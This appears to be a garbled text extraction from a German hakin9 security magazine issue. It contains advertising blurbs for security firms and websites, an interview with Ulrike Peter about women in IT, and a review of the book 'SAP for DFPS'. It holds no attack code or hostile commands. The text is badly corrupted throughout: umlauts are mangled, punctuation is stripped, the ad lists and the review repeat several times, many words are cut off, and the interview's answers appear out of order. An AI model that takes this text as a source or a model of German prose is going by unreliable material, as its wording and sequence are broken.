die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
